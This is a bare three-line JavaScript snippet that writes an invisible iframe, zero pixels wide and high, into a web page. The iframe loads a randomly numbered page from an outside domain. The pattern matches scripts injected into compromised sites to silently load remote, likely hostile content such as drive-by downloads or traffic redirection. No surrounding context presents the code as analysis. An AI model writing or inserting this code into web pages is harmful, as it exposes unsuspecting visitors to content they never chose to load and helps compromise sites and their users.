var i=Math.floor(Math.random()*100+1);
var a="<iframe src=http://www.jk126.net/502"+i+".html width=0"+" height=0>";
document.write(a);
